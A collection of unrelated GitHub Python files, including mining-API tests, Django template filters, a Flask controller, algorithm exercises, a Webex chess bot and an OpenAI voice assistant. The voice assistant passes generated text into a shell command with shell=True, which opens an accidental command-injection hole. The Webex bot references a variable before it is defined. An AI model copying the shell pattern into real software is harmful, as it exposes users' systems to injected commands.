+{"seq_id":"3609397043","text":"# from mock import patch\nimport datetime\nfrom mock import patch\nfrom tests import BaseCase\nfrom api import mining_api\n\nBDAY_TUPLE = (1982, 9, 2, 16, 30, 0) # yay my birthday\n\n\nclass MiningTestsBase(BaseCase):\n pass\n\n\n# Association RuleSet Tests\n'''\nclass QueryRuleSetEntitiesTests(MiningTestsBase):\n \"\"\"\n Tests around querying for Association RulesSets\n \"\"\"\n def setUp(self):\n super(QueryRuleSetEntitiesTests, self).setUp()\n\n m2 = mining_api.AssociationRuleModel(['Cheese:1', 'Peanut Butter:0'],\n ['Steak:1'],\n .25)\n\n mining_api.create_rules('ruleset_id', [m1, m2])\n\n def test_no_params(self):\n raise Exception('not yet')\n result = mining_api._query_rule_entities()\n\n self.assertEqual(len(result), 2)\n self.assertTrue(isinstance(result[0], mining_api.AssociationRuleEntity))\n self.assertTrue(isinstance(result[1], mining_api.AssociationRuleEntity))\n'''\n\n\nclass CreateRulesetTests(MiningTestsBase):\n\n @patch('api.mining_api.get_resource_id_from_key', return_value='mocked_id')\n def test_base(self, m_get_id):\n result = mining_api.create_ruleset(.4, .7)\n\n self.assertTrue(isinstance(result, mining_api.AssociationRuleSetModel))\n self.assertEqual(result.min_confidence, .7)\n self.assertEqual(result.min_support, .4)\n self.assertEqual(result.total_rules, None)\n self.assertTrue(isinstance(result.created_timestamp, datetime.datetime))\n self.assertEqual(result.id, 'mocked_id')\n\n# Association Rule Tests\n\n\nclass RuleModelTests(MiningTestsBase):\n def test_get_rule_item_id(self):\n \"\"\"\n Ensure we can generate a composite pref id for use in txn lists\n representing item and if the session user liked it or not.\n \"\"\"\n\n rule_model = mining_api.AssociationRuleModel(['Peanut Butter:1', 'Steak:0', 'Peanut Butter:0'],\n ['Cheese:0'],\n .25)\n\n self.assertEqual(rule_model.generate_rule_key(), 'peanut_butter:0__peanut_butter:1__steak:0')\n\n\nclass QueryRuleEntitiesTests(MiningTestsBase):\n \"\"\"\n Tests around querying for Association Rules\n \"\"\"\n def setUp(self):\n super(QueryRuleEntitiesTests, self).setUp()\n\n m1 = mining_api.AssociationRuleModel(['Peanut Butter:1', 'Steak:0', 'Peanut Butter:0'],\n ['Cheese:0'],\n .25)\n m2 = mining_api.AssociationRuleModel(['Cheese:1', 'Peanut Butter:0'],\n ['Steak:1'],\n .25)\n\n mining_api.create_rules('ruleset_id', [m1, m2])\n\n def test_no_params(self):\n result, cursor, more = mining_api._query_rule_entities()\n\n self.assertEqual(len(result), 2)\n self.assertTrue(isinstance(result[0], mining_api.AssociationRuleEntity))\n self.assertTrue(isinstance(result[1], mining_api.AssociationRuleEntity))\n\n\nclass QueryRuleModelsTests(MiningTestsBase):\n @patch('api.mining_api._query_rule_entities')\n @patch('api.mining_api._populate_rule_model')\n def test_base(self, mock_populate, mock_query):\n # Setup Mocks\n mock_query.return_value = (['a', 'b'], None, False)\n\n # Run Code To Test\n result = mining_api.query_rule_models(limit=4, kwarg=True)\n\n # Check results\n self.assertEqual(result, ([mock_populate.return_value, mock_populate.return_value], None, False))\n mock_query.assert_called_once_with(limit=4, kwarg=True)\n\n\n@patch('api.mining_api.get_resource_id_from_key', return_value='mocked_id')\nclass CreateRuleTest(MiningTestsBase):\n \"\"\"Tests around creating a single AssociationRuleModel\"\"\"\n\n def test_base(self, m_get_id):\n ant = ['Peanut Butter:1', 'Steak:0', 'Peanut Butter:0']\n con = ['Cheese:0']\n\n m = mining_api.AssociationRuleModel(ant, con, .85)\n result = 
mining_api.create_rule('ruleset_id', m)\n\n self.assertTrue(isinstance(result, mining_api.AssociationRuleModel))\n self.assertEqual(result.ant, ['Peanut Butter:1', 'Steak:0', 'Peanut Butter:0'])\n self.assertEqual(result.con, ['Cheese:0'])\n self.assertEqual(result.confidence, .85)\n self.assertEqual(result.rule_key, 'peanut_butter:0__peanut_butter:1__steak:0')\n self.assertEqual(result.id, 'mocked_id')\n self.assertEqual(result.ruleset_id, 'ruleset_id')\n\n\n@patch('api.mining_api.get_resource_id_from_key', return_value='mocked_id')\nclass CreateMultiTest(MiningTestsBase):\n \"\"\"Tests around creating multiple AssociationRuleModel at once\"\"\"\n def test_base(self, m_get_id):\n ant = ['Peanut Butter:1', 'Steak:0', 'Peanut Butter:0']\n con = ['Cheese:0']\n\n m1 = mining_api.AssociationRuleModel(ant, con, .85)\n m2 = mining_api.AssociationRuleModel(ant, con, .85)\n result = mining_api.create_rules('ruleset_id', [m1, m2])\n\n self.assertTrue(isinstance(result, list))\n\n self.assertTrue(isinstance(result[0], mining_api.AssociationRuleModel))\n self.assertEqual(result[0].ant, ant)\n self.assertEqual(result[0].con, con)\n self.assertEqual(result[0].confidence, .85)\n self.assertEqual(result[0].rule_key, 'peanut_butter:0__peanut_butter:1__steak:0')\n self.assertEquals(result[0].id, 'mocked_id')\n self.assertEqual(result[0].ruleset_id, 'ruleset_id')\n\n self.assertEqual(m_get_id.call_count, 2)\n\n\nclass DeleteRulesTests(MiningTestsBase):\n def setUp(self):\n super(DeleteRulesTests, self).setUp()\n\n m1 = mining_api.AssociationRuleModel(['Peanut Butter:1', 'Steak:0', 'Peanut Butter:0'],\n ['Cheese:0'],\n .25)\n mining_api.create_rules('ruleset_id', [m1])\n\n def base_test(self):\n\n self.assertEqual(1, len(mining_api.query_rule_models()[0]))\n mining_api.delete_rules()\n self.assertEqual(0, len(mining_api.query_rule_models()[0]))\n\n\"\"\"\n\nclass DeleteRulesSinceTests(MiningTestsBase):\n def base_test(self):\n result = mining_api.delete_rules_since()\n\"\"\"\n\n\n\"\"\"\n\nclass RunAprioriTests(MiningTestsBase):\n def base_test(self):\n result = mining_api.run_apriori()\n\"\"\"\n\"\"\"\n\nclass PrintItemsAndRulesTests(MiningTestsBase):\n def base_test(self):\n result = mining_api._print_items_and_rules()\n\n\"\"\"\n\"\"\"\n\nclass PopulateEntityTests(MiningTestsBase):\n def base_test(self):\n result = mining_api._populate_entity()\n\"\"\"\n","repo_name":"divrods/pref-service","sub_path":"tests/api_tests/mining_api_tests.py","file_name":"mining_api_tests.py","file_ext":"py","file_size_in_byte":6682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"70883098972","text":"import calendar\nimport datetime\nimport math\n\nfrom collections import defaultdict\n\nfrom django import template\nfrom django.core.paginator import Paginator, EmptyPage\nfrom django.db.models.query import QuerySet\nfrom django.utils.safestring import mark_safe\nfrom django.template import defaultfilters\n\nfrom synnefo.lib.ordereddict import OrderedDict\nfrom synnefo.util import units\n\nfrom astakos.im import settings\nfrom astakos.im.models import ProjectResourceGrant, Project\nfrom astakos.im.views import util as views_util\nfrom astakos.im import util\nfrom astakos.im import presentation\nfrom astakos.im.models import AstakosUser\n\nfrom astakos.im import quotas\n\nregister = template.Library()\n\nDELIM = ','\n\n\ndef _is_inf(value):\n try:\n return value == units.PRACTICALLY_INFINITE\n except:\n return False\n\n\n@register.filter\ndef monthssince(joined_date):\n now = datetime.datetime.now()\n date = datetime.datetime(\n year=joined_date.year, month=joined_date.month, day=1)\n months = []\n\n month = date.month\n year = date.year\n timestamp = calendar.timegm(date.utctimetuple())\n\n while date < now:\n months.append((year, month, timestamp))\n\n if date.month < 12:\n month = date.month + 1\n year = date.year\n else:\n month = 1\n year = date.year + 1\n\n date = datetime.datetime(year=year, month=month, day=1)\n timestamp = calendar.timegm(date.utctimetuple())\n\n return months\n\n\n@register.filter\ndef to_unicode(s):\n return unicode(s)\n\n\n@register.filter\ndef to_string(s):\n return str(s)\n\n\n@register.filter\ndef lookup(d, key):\n try:\n return d.get(key)\n except:\n return\n\n\n@register.filter\ndef lookup_uni(d, key):\n return d.get(unicode(key))\n\n\n@register.filter\ndef dkeys(d):\n return d.keys()\n\n\n@register.filter\ndef month_name(month_number):\n return calendar.month_name[month_number]\n\n\n@register.filter\ndef todate(value, arg=''):\n secs = int(value) / 1000\n return datetime.datetime.fromtimestamp(secs)\n\n\n# @register.filter\n# def rcut(value, chars='/'):\n# return value.rstrip(chars)\n\n\n@register.filter\ndef paginate(l, args):\n l = l or []\n page, delim, sorting = args.partition(DELIM)\n if sorting:\n if isinstance(l, QuerySet):\n l = l.order_by(sorting)\n elif isinstance(l, list):\n default = ''\n if sorting.endswith('_date'):\n default = datetime.datetime.utcfromtimestamp(0)\n l.sort(key=lambda i: getattr(i, sorting)\n if getattr(i, sorting) else default)\n paginator = Paginator(l, settings.PAGINATE_BY)\n try:\n paginator.len\n except AttributeError:\n paginator._count = len(list(l))\n\n try:\n page_number = int(page)\n except ValueError:\n if page == 'last':\n page_number = paginator.num_pages\n else:\n page_number = 1\n try:\n page = paginator.page(page_number)\n except EmptyPage:\n page = paginator.page(1)\n return page\n\n\n@register.filter\ndef concat(str1, str2):\n if not str2:\n return str(str1)\n return '%s%s%s' % (str1, DELIM, str2)\n\n\n@register.filter\ndef items(d):\n if isinstance(d, defaultdict):\n return d.iteritems()\n return d\n\n\n@register.filter\ndef get_value_after_dot(value):\n return value.split(\".\")[1]\n\n# @register.filter\n# def strip_http(value):\n# return value.replace('http://','')[:-1]\n\n\n@register.filter\ndef truncatename(v, max=18, append=\"...\"):\n util.truncatename(v, max, append)\n\n\n@register.filter\ndef selected_resource_groups(project_or_app):\n if not project_or_app:\n return []\n\n grants = project_or_app.resource_set\n resources = grants.values_list('resource__name', 
flat=True)\n    return map(lambda r: r.split(\".\")[0], resources)\n\n\n@register.filter\ndef resource_grants(project_or_app):\n    try:\n        grants = project_or_app.resource_set\n        grants = grants.values_list(\n            'resource__name', 'member_capacity', 'project_capacity')\n        return dict((e[0], {'member':e[1], 'project':e[2]}) for e in grants)\n    except:\n        return {}\n\n\ndef get_resource_grant(project_or_app, rname, capacity_for):\n    if project_or_app is None:\n        return None\n\n    resource_set = project_or_app.resource_set\n    if not resource_set.filter(resource__name=rname).count():\n        return None\n\n    resource = resource_set.get(resource__name=rname)\n    return getattr(resource, '%s_capacity' % capacity_for)\n\n\n@register.filter\ndef get_member_resource_grant_value(project_or_app, rname):\n    return get_resource_grant(project_or_app, rname, \"member\")\n\n\n@register.filter\ndef get_project_resource_grant_value(project_or_app, rname):\n    return get_resource_grant(project_or_app, rname, \"project\")\n\n\n@register.filter\ndef resource_diff(r, member_or_project):\n    if not hasattr(r, 'display_project_diff'):\n        return ''\n\n    diff = dict(zip(['project', 'member'],\n                    r.display_project_diff())).get(member_or_project)\n\n    diff_disp = ''\n    if diff != '':\n        diff_disp = \"(%s)\" % diff\n    tpl = '<span class=\"%s\">%s</span> '\n    cls = 'red' if diff.startswith(\"-\") else 'green'\n    return mark_safe(tpl % (cls, diff_disp))\n\n\n@register.filter\ndef sorted_resources(resources_set):\n    return views_util.sorted_resources(resources_set)\n\n\n@register.filter\ndef display_resource_usage_for_project(resource, project):\n    usage_map = presentation.USAGE_TAG_MAP\n    quota = quotas.get_project_quota(project).get(resource.name, None)\n\n    if not quota:\n        return \"No usage\"\n\n    cls = ''\n    usage = quota['project_usage']\n    limit = quota['project_limit']\n\n    if limit == 0 and usage == 0:\n        return \"--\"\n\n    usage_perc = \"%d\" % ((float(usage) / limit) * 100) if limit else \"100\"\n    _keys = usage_map.keys()\n    _keys.reverse()\n    closest = filter(lambda x: int(x) <= int(usage_perc), _keys)[0]\n    cls = usage_map[closest]\n\n    usage_display = units.show(usage, resource.unit)\n    usage_perc_display = \"%s%%\" % usage_perc\n\n    resp = \"\"\"<span class=\"%s\">%s</span> (%s) \"\"\" % \\\n        (cls, usage_perc_display, usage_display)\n    return mark_safe(resp)\n\n\n@register.filter\ndef is_pending_app(app):\n    if not app:\n        return False\n    return app.state in [app.PENDING]\n\n\n@register.filter\ndef is_denied_app(app):\n    if not app:\n        return False\n    return app.state in [app.DENIED]\n\n\ndef _member_policy_formatter(form_or_app, value, changed, mapping):\n    if changed:\n        changed = defaultfilters.title(mapping.get(changed))\n    value = defaultfilters.title(mapping.get(value))\n    return value, changed, None, None\n\n\ndef _owner_formatter(form_or_app, value, changed):\n    if not changed:\n        changed_name = None\n    else:\n        changed_name = changed.realname\n    return value.realname if value else None, changed_name, None, None\n\n\ndef _owner_admin_formatter(form_or_app, value, changed):\n    if not changed:\n        changed_name = None\n    else:\n        changed_name = changed.realname + \" (%s)\" % changed.email\n    return value.realname + \" (%s)\" % value.email if value else None, changed_name, None, None\n\n\ndef _owner_owner_formatter(form_or_app, value, changed):\n    if not changed:\n        changed_name = None\n    else:\n        changed_name = changed.realname\n    return \"Me\", changed_name, None, None\n\n\nMODIFICATION_FORMATTERS = {\n    'member_policy': _member_policy_formatter,\n    'owner': _owner_formatter,\n    'owner_admin': _owner_admin_formatter,\n    'owner_owner': _owner_owner_formatter\n}\n\n\n@register.filter\ndef display_modification_param(form_or_app, param, formatter=None):\n    formatter_name = None\n    if \",\" in param:\n        param, formatter_name = param.split(\",\", 1)\n\n    project_attr = param\n\n    if hasattr(form_or_app, 'instance'):\n        # form\n        project = Project.objects.get(pk=form_or_app.instance.pk)\n        app_value = form_or_app.cleaned_data[param]\n        project_value = getattr(project, project_attr)\n    else:\n        # app\n        project = form_or_app.chain\n        app_value = getattr(form_or_app, project_attr)\n        project_value = getattr(project, project_attr)\n        if app_value is None:\n            app_value = project_value\n\n    formatter_params = {}\n\n    if param == \"member_join_policy\":\n        formatter_name = 'member_policy'\n        formatter_params = {'mapping':\n                            presentation.PROJECT_MEMBER_JOIN_POLICIES}\n\n    if param == \"member_leave_policy\":\n        formatter_name = 'member_policy'\n        formatter_params = {'mapping':\n                            presentation.PROJECT_MEMBER_LEAVE_POLICIES}\n\n    changed = False\n    changed_cls = \"gray details\"\n    if project_value != app_value:\n        changed = project_value\n\n    if not formatter and formatter_name:\n        formatter = MODIFICATION_FORMATTERS.get(formatter_name)\n\n    changed_prefix = \"current: \"\n    if formatter:\n        app_value, changed, cls, prefix = formatter(form_or_app,\n                                                    app_value, changed,\n                                                    **formatter_params)\n        if cls:\n            changed_cls = cls\n\n        if prefix:\n            changed_prefix = prefix\n\n    tpl = \"\"\"%(value)s\"\"\"\n    if changed:\n        tpl += \"\"\"<br />\"\"\" + \\\n               \"\"\"<span class=\"%(changed_cls)s\">%(changed_prefix)s%(changed)s</span> \"\"\"\n\n    if not app_value:\n        app_value = \"(not set)\"\n\n    return mark_safe(tpl % {\n        'value': app_value,\n        'changed': changed,\n        'changed_cls': changed_cls,\n        'changed_prefix': changed_prefix\n    })\n\n\n@register.filter\ndef display_modification_param_diff(form_or_app, param):\n    def formatter(form_or_app, value, changed):\n        if changed in [None, False]:\n            if _is_inf(value):\n                value = \"Unlimited\"\n            return value, changed, None, \" \"\n\n        to_inf = _is_inf(value)\n        from_inf = _is_inf(changed)\n\n        diff = value - changed\n        sign = \"+\"\n        cls = \"green\"\n        if diff < 0:\n            sign = \"-\"\n            diff = abs(diff)\n            cls = \"red\"\n\n        if diff != 0:\n            if from_inf or to_inf:\n                if from_inf:\n                    changed = \"Unlimited\"\n                diff = \"from %s\" % changed\n            else:\n                diff = sign + str(diff)\n            changed = \"(%s)\" % (diff,)\n        else:\n            changed = None\n\n        if to_inf:\n            value = \"Unlimited\"\n        return value, changed, cls, \" \"\n\n    return display_modification_param(form_or_app, param, formatter)\n\n\n@register.filter\ndef display_date_modification_param(form_or_app, params):\n    param, date_format = params.split(\",\", 1)\n\n    def formatter(form_or_app, value, changed):\n        if changed not in [None, False]:\n            changed = defaultfilters.date(changed, date_format)\n        formatted_value = defaultfilters.date(value, date_format)\n        return formatted_value, changed, None, None\n\n    return display_modification_param(form_or_app, param, formatter)\n\n\n@register.filter\ndef inf_display(value):\n    if value == units.PRACTICALLY_INFINITE:\n        return 'Unlimited'\n    return value\n\n\n@register.filter\ndef inf_value_display(value):\n    if value == units.PRACTICALLY_INFINITE:\n        return 'Unlimited'\n    return value\n\n\n@register.filter\ndef project_name_for_user(project, user):\n    return project.display_name_for_user(user)\n\n\n@register.filter\ndef owner_by_uuid(uuid):\n    try:\n        user = AstakosUser.objects.get(uuid=uuid)\n        return \"%s %s (%s)\" % (user.first_name, user.last_name, user.email)\n    except AstakosUser.DoesNotExist:\n        return 
uuid\n\n\n@register.filter\ndef format_inf(value):\n if _is_inf(value):\n return \"Unlimited\"\n return value\n","repo_name":"grnet/synnefo","sub_path":"snf-astakos-app/astakos/im/templatetags/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":11861,"program_lang":"python","lang":"en","doc_type":"code","stars":133,"dataset":"github-code","pt":"32"}
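Most of these filters need Django models, but a few are pure Python and easy to check in isolation; for example `monthssince`, which only uses `datetime` and `calendar` (assuming the function is imported from this module):

```python
import datetime

joined = datetime.datetime(2013, 11, 20)
months = monthssince(joined)            # [(year, month, unix_timestamp), ...]
print(months[0][:2], months[-1][:2])    # first and most recent (year, month)
```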
+{"seq_id":"15243743884","text":"\"\"\"\n@filename : Student.py\n@description : Student 테이블 Controller 구현 \n@author : 천준홍 (cj562270@gmail.com)\n\"\"\"\nfrom flask import request\nfrom flask_restful import Resource\nfrom flask_sqlalchemy import SQLAlchemy\nfrom models.Students import Student as studentModel\nimport json\nfrom utils.Util import replace_quotes\nfrom utils.Util import get_now_string\n\ndb = SQLAlchemy()\n\n# JSON 페이지를 담당하는 클래스\nclass Student(Resource):\n def get(self):\n # 조회 결과를 저장할 빈 변수\n rs = None\n name = request.args.get('name')\n pk = request.args.get('pk')\n\n # 문제 3번(검색어 목록 조회)\n if(pk == None):\n if(name == None):\n name = ''\n search = \"%{}%\".format(name)\n try:\n # like를 이용하여 파라미터가 포함된 이름을 찾고 원하는 컬럼만 select\n rs = studentModel.query.filter(studentModel.name.like(search)).with_entities(studentModel.name, studentModel.grade, studentModel.deptno, studentModel.userid).all()\n except Exception as e:\n return {'rt': replace_quotes(str(e)), 'pubDate': get_now_string()}, 500\n \n # select 결과를 json으로 내보내기 위해 dictionary로 변환\n dic = []\n for i,v in enumerate(rs):\n dic.append({'name': v[0] ,'grade' : v[1] ,'deptno': v[2] ,'userid': v[3]})\n \n return {'rt': 'OK', 'item': dic, 'pubDate': get_now_string()}\n\n # 문제 4번 (pk 파라미터 입력 상세조회)\n else:\n try:\n rs = studentModel.query.filter(studentModel.studno == pk).all()\n # query 오류시 메세지 출력\n except Exception as e:\n return {'rt': replace_quotes(str(e)), 'pubDate': get_now_string()}, 500\n \n # 존재하지 않는 pk값을 입력했을떄 오류메세지 출력\n if (len(rs) == 0):\n return '해당 pk값을 데이터베이스에서 찾을 수 없습니다.'\n dic = rs[0].to_dict()\n\n return {'rt': 'OK', 'item': dic, 'pubDate': get_now_string()}\n\n # 문제 5\n def post(self):\n # 저장할 값을 post 파라미터로 수신\n name = request.form.get('name')\n userid = request.form.get('userid')\n grade = request.form.get('grade')\n idnum = request.form.get('idnum')\n birthdate = request.form.get('birthdate')\n tel = request.form.get('tel')\n height = request.form.get('height')\n weight = request.form.get('weight')\n deptno = request.form.get('deptno')\n profno = request.form.get('profno')\n \n # 수신된 값을 model 객체로 묶는다.\n item = studentModel(name=name, userid=userid,grade=grade, idnum=idnum, birthdate=birthdate, tel=tel, height=height, weight=weight, deptno=deptno, profno=profno)\n \n try:\n # 저장 (insert)\n db.session.add(item)\n # 변경사항 반영\n db.session.commit()\n except Exception as e:\n # 에러가 났다면 변경사항 되돌리기\n db.session.rollback()\n return {'rt': replace_quotes(str(e)), 'pubDate': get_now_string()}, 500\n \n return {'rt': 'OK', 'pubDate': get_now_string()}, 200\n \n # 문제 6\n def put(self):\n studno = request.form.get('studno')\n name = request.form.get('name')\n userid = request.form.get('userid')\n grade = request.form.get('grade')\n idnum = request.form.get('idnum')\n birthdate = request.form.get('birthdate')\n tel = request.form.get('tel')\n height = request.form.get('height')\n weight = request.form.get('weight')\n deptno = request.form.get('deptno')\n profno = request.form.get('profno')\n \n # 입력받은 파라미터만 dictionary로 구성(원하는 파라미터만 변경하기 위함)\n param_list = [name, userid, grade, idnum, birthdate, tel, height, weight, deptno, profno]\n param_str = ['name','userid','grade','idnum','birthdate','tel','height','weight','deptno','profno']\n dic = {}\n for i,v in enumerate(param_list):\n if (v == None):\n continue\n dic[param_str[i]] = v\n\n # 존재하지 않는 studno(pk) 값 입력시 에러메세지 출력\n try:\n rs = studentModel.query.filter(studentModel.studno == studno).all()\n except Exception as e:\n return {'rt': replace_quotes(str(e)), 'pubDate': 
","repo_name":"junhong-CHEON/flask_study","sub_path":"210830-flask문제/controllers/Students.py","file_name":"Students.py","file_ext":"py","file_size_in_byte":6148,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"29221874273","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\nfor _ in range(int(input())):\r\n W = input().rstrip()\r\n left, right = [], []\r\n \r\n for s in W:\r\n # <1. 커서를 왼쪽으로 옮기는 경우>\r\n if s == '<' and left:\r\n right.append(left.pop())\r\n # <2. 커서를 오른쪽으로 옮기는 경우> \r\n elif s == '>' and right:\r\n left.append(right.pop())\r\n # <3. 제거하는 경우> \r\n elif s == '-' and left:\r\n left.pop()\r\n # <4. 추가하는 경우> \r\n elif s.isalnum():\r\n left.append(s)\r\n \r\n left.extend(reversed(right)) \r\n print(''.join(left))","repo_name":"bbbang105/BaekjoonPrac","sub_path":"백준/Silver/5397. 키로거/키로거.py","file_name":"키로거.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"17839405407","text":"from flask import Flask, request\nimport json\nfrom webexteamssdk import WebexTeamsAPI, Webhook\nimport parser\nfrom helpers import (read_yaml_data,\n get_ngrok_url,\n find_webhook_by_name,\n delete_webhook, create_webhook)\n\nfrom conf import access_token\n\nflask_app = Flask(__name__)\nteams_api = None\n\n@flask_app.route('/teamswebhook', methods=['POST'])\ndef teamswebhook():\n \"\"\"\n Handle \n \"\"\"\n print(\"\\n\" + str(request.method) + \" received\\n\")\n print(request.json)\n\n json_data = request.json\n webhook_obj = Webhook(json_data)\n room = teams_api.rooms.get(webhook_obj.data.roomId)\n message = teams_api.messages.get(webhook_obj.data.id)\n\n # Don't respond to yourself\n if message.personId == teams_api.people.me().id:\n return 'OK'\n else:\n teams_api.messages.create(room.id, text=chess_response)\n person = teams_api.people.get(message.personId)\n \n with open('players.json') as f:\n player_json = f.read()\n\n try:\n board_dest = json.loads(player_json)[0][person]['active']\n except(Exception) as e:\n board_dest = \"board.bd\"\n board_dict = json.loads(player_json)[0]\n board_dict[person]['active'] = board_dest\n with open('players.json', 'w') as f:\n json.dump(board_dict, f)\n \n\n board = parser.Board(dest=board_dest)\n chess_response = parser.parse(board, message)\n\nif __name__ == '__main__':\n\n teams_api = WebexTeamsAPI(access_token=access_token)\n ngrok_url = get_ngrok_url()\n\n webhook_name = 'hello-bot-wb-hook'\n dev_webhook = find_webhook_by_name(teams_api, webhook_name)\n if dev_webhook:\n delete_webhook(teams_api, dev_webhook)\n create_webhook(teams_api, webhook_name, ngrok_url + '/teamswebhook')\n\n flask_app.run(host='0.0.0.0', port=5000)\n","repo_name":"tobyjamez/chesspacito","sub_path":"hello_bot/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"20818709619","text":"import threading\n# 定义 个普通的 action 方法,该方法准备作为线程执行体\n\n\ndef action(max1):\n for m in range(max1):\n # 调用 threadi 呵棋块的 cur re 口 t thread ()函��获取当前线程\n # 调用线程对象的 getName ()方法获取当前线程的名字\n print(threading.current_thread().getName() + \"_action_\" + str(m))\n\n\n# 下面是主程序(也就是主线程的线程执行体)\nfor i in range(100):\n # 调用 threading 模块的 current_thread ()函数获取当前线程\n print(threading.current_thread().getName() + \"\" + str(i))\n if i == 20:\n # 创建并启动第一个线程\n t1 = threading.Thread(target=action, args=(100,))\n t1.start()\n # 创建并启动第2个线程\n t2 = threading.Thread(target=action, args=(100,))\n t2.start()\nprint('主线程执行完成!')\n","repo_name":"Carlzkh/CrazyPythonNotes","sub_path":"14/14.2/first_thread.py","file_name":"first_thread.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"14275206693","text":"from dependency_injector.wiring import Provide, inject\nfrom fastapi import APIRouter, Depends\n\nfrom domain.ports.get_order_details_port import OrderDetailsInputPort\nfrom domain.use_cases.get_order_details import GetOrderDetailsByIdUseCase\nfrom frameworks.container import FrameworkContainer\nfrom interface_adapters.dtos.get_order_details_dto import GetOrderDetailsOutputDTO\n\norder_details_route = APIRouter()\n\n\n@order_details_route.get(\n \"/order/details/{order_details_id}\", response_model=GetOrderDetailsOutputDTO\n)\n@inject\nasync def get_order_details(\n order_details_id: int,\n get_order_details_use_case: GetOrderDetailsByIdUseCase = Depends(\n Provide[FrameworkContainer.get_order_details_use_case]\n ),\n) -> GetOrderDetailsOutputDTO:\n \"\"\"Route to create a new table into postgres from a csv file\"\"\"\n try:\n input_port = OrderDetailsInputPort(order_details_id=order_details_id)\n\n output_use_case = await get_order_details_use_case(input_port=input_port)\n\n return GetOrderDetailsOutputDTO(\n order_details_id=output_use_case.order_details_id,\n order_id=output_use_case.order_id,\n pizza_id=output_use_case.pizza_id,\n quantity=output_use_case.quantity,\n )\n except Exception as error:\n return {\"error\": f\"{error}\"}\n","repo_name":"dtleal/gwtk_pizza_place","sub_path":"src/interface_adapters/routes/v1/get_order_details.py","file_name":"get_order_details.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"20284690825","text":"from typing import List\n\n\nclass Solution:\n def removeDuplicates(self, nums: List[int]) -> int:\n \"\"\"\n 主要注意删除时下标的变化\n 不能继续用下标迭代,因为长度变化了\n\n 1\n 不需要 每次调用 len 自己记录\n\n 2\n 不需要 pre\n\n 3\n 看了答案记录即可\n \"\"\"\n if not nums:\n return 0\n count = 0\n for i in range(1, len(nums)):\n if nums[count] != nums[i]:\n count += 1\n nums[count] = nums[i]\n return count + 1\n\n\nif __name__ == '__main__':\n Solution().removeDuplicates([1, 1, 2])\n","repo_name":"pingfangx/pythonx","sub_path":"ToolsX/leetcode/0026/0026_3.py","file_name":"0026_3.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"zh","doc_type":"code","stars":22,"dataset":"github-code","pt":"32"}
+{"seq_id":"23176798673","text":"import os \nimport openai \nimport pvporcupine \nimport speech_recognition as sr\nimport struct\nimport pyaudio\nimport time\nimport pvcobra\nimport wave\nfrom pydub import AudioSegment\nfrom pydub.playback import play\nfrom gtts import gTTS \nfrom playsound import playsound\n\nimport yaml\n\nimport sys\nimport psutil\nimport logging\ndef read_yaml():\n with open('config.yaml', \"r\") as f:\n return yaml.safe_load(f)\nconf = read_yaml()\nPICOVOICEKEY = conf['Keys']['picovoice']\naikey = conf['Keys']['openai']\n\nimport subprocess\n\n\ndef copy2clip(txt):\n cmd='echo '+txt.strip()+'|clip'\n return subprocess.check_call(cmd, shell=True)\n\n\n\n\n\ncobra = pvcobra.create(access_key=PICOVOICEKEY)\n\nopenai.api_key = aikey\nvoice_file = \"voice.wav\"\nfilename = voice_file\nchunk = 1024\nFORMAT = pyaudio.paInt16\nchannels = 1\nsample_rate = 44100\np = pyaudio.PyAudio()\nstream = p.open(format=FORMAT,\n channels=channels,\n rate=sample_rate,\n input=True,\n output=True,\n frames_per_buffer=chunk)\nframes = []\n\nporcupine = pvporcupine.create(\n access_key=PICOVOICEKEY,keyword_paths=['Hey-Friday_en_windows_v2_2_0.ppn'],\n keywords=['Hey Jarvis']\n)\n\nr = sr.Recognizer()\n\n\n\nwake_word = 'hey assistant'\npa = pyaudio.PyAudio()\naudio_stream = pa.open(\n rate=porcupine.sample_rate,\n channels=1,\n format=pyaudio.paInt16,\n input=True,\n frames_per_buffer=porcupine.frame_length)\n\nprint(\"Listening for wake word ('{}')...\".format(wake_word))\n\nwhile True:\n pcm = audio_stream.read(porcupine.frame_length)\n pcm = struct.unpack_from(\"h\" * porcupine.frame_length, pcm)\n \n keyword_index = porcupine.process(pcm)\n if keyword_index >= 0:\n stream.start_stream()\n \n \n \n \n \n prompt = None\n\n\n start_time = time.time()\n\n while True:\n pcm = audio_stream.read(cobra.frame_length)\n pcm = struct.unpack_from(\"h\"*cobra.frame_length,pcm)\n voice_probability = cobra.process(pcm)\n\n data = stream.read(chunk)\n frames.append(data)\n\n if voice_probability <= 0.2:\n elapsed_time = time.time() - start_time\n if elapsed_time >= 2.0:\n stream.stop_stream()\n \n \n wf = wave.open(filename, \"wb\")\n wf.setnchannels(channels)\n wf.setsampwidth(p.get_sample_size(FORMAT))\n wf.setframerate(sample_rate)\n wf.writeframes(b\"\".join(frames))\n \n transcript = ' '\n\n with sr.AudioFile(filename) as source:\n text = None\n try: \n text = r.recognize_google(r.record(source),None,\"en-US\",0,False)\n except TypeError as e:\n transcript = ' say \"sorry i didnt get that\"'\n transcript = text\n print(transcript)\n \n \n \n \n \n if not isinstance(transcript, str):\n transcript = ' say \"sorry i didnt get that\"'\n wf.close()\n \n os.remove('voice.wav')\n prompt = 'your name will be Friday and your job is an AI Voice Assistant, here is your text, ' + transcript \n\n \n break\n\n else:\n start_time = time.time()\n\n\n\n\n \n \n response = openai.Completion.create(\n model=\"text-davinci-003\",prompt=prompt, temperature = 0,n=1)\n if 'choices' in response and len(response['choices']) > 0:\n message = response['choices'][0]['text']\n copy2clip(message)\n\n #\n tts = gTTS(text=message, lang='en', tld='co.za')\n tts.save('generated_message.mp3')\n\n \n audio_file = 